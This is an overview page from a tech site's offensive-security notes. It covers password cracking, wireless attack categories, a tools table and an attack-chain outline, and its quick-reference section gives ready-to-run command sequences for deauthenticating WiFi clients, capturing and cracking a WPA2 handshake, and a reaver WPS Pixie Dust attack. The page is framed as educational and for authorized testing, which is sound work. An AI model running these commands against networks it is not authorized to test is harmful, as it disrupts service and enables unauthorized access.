Attacks
2 min readArticle
This section documents offensive security techniques, tools, and attack methodologies. Everything here is for authorized security testing, education, and understanding attack patterns to better defend against them.
Categories
Password Cracking
Breaking password hashes or brute-forcing authentication:
- Offline tools — Hashcat, John the Ripper, RainbowCrack
- Online tools — Hydra (live service brute force)
- Wordlist generation — CeWL, Crunch, WYD, RSMangler
Wireless Hacking
Attacking WiFi, Bluetooth, and other RF protocols:
- WiFi hacking — WPA/WPA2/WPA3, WPS, evil twin, deauth
- SDR — Software Defined Radio for RF analysis
- Bluetooth — BLE and classic Bluetooth attacks
- RFID/NFC — Card cloning and relay attacks
- HackRF — SDR hardware for active RF attacks
Attack Methodology (General)
The Attack Chain
shell
Recon → Scanning → Exploitation → Post-Exploitation → Persistence → Exfil
- Reconnaissance — gather information (passive + active)
- Scanning — identify open ports, services, vulnerabilities
- Exploitation — gain initial access
- Post-exploitation — escalate privileges, move laterally
- Persistence — maintain access
- Exfiltration — extract data of interest
Key Principles
- Least privilege — request/use only the access needed
- Stealth vs speed — quieter attacks take longer but evade detection
- Documentation — log everything for reporting
- Stay in scope — never exceed authorized boundaries
Tools by Category
| Category | Tool | Use |
|---|---|---|
| Password cracking | Hashcat | GPU-accelerated offline cracking |
| Password cracking | John the Ripper | Versatile offline cracker |
| Password cracking | Hydra | Online brute forcing |
| WiFi | Aircrack-ng suite | Complete WiFi attack toolkit |
| WiFi | Reaver/Bully | WPS attacks |
| WiFi | Wifite | Automated WiFi attacks |
| WiFi | Airgeddon | Menu-driven WiFi attacks |
| Packet analysis | Wireshark/TShark | Capture and analyze |
| Packet crafting | Scapy | Custom packet injection |
| Network scan | Nmap | Port/service discovery |
| Recon | Kismet | Passive wireless monitoring |
Quick Reference — Common Attack Flows
WPA2 Handshake Capture + Crack
bash
# 1. Monitor mode
airmon-ng start wlan0
# 2. Find target
airodump-ng wlan0mon
# 3. Capture
airodump-ng -c 6 --bssid TARGET_BSSID -w capture wlan0mon
# 4. Deauth to force handshake
aireplay-ng -0 10 -a TARGET_BSSID wlan0mon
# 5. Crack
aircrack-ng -w rockyou.txt capture-01.cap
WPS Pixie Dust
bash
wash -i wlan0mon # Find WPS-enabled APs
reaver -i wlan0mon -b BSSID -K 1 -vv
See Also
- ../osint-and-recon/index - Reconnaissance first
- ../networking/index - Networking fundamentals
techzonesite.comUnlock Your IT Potential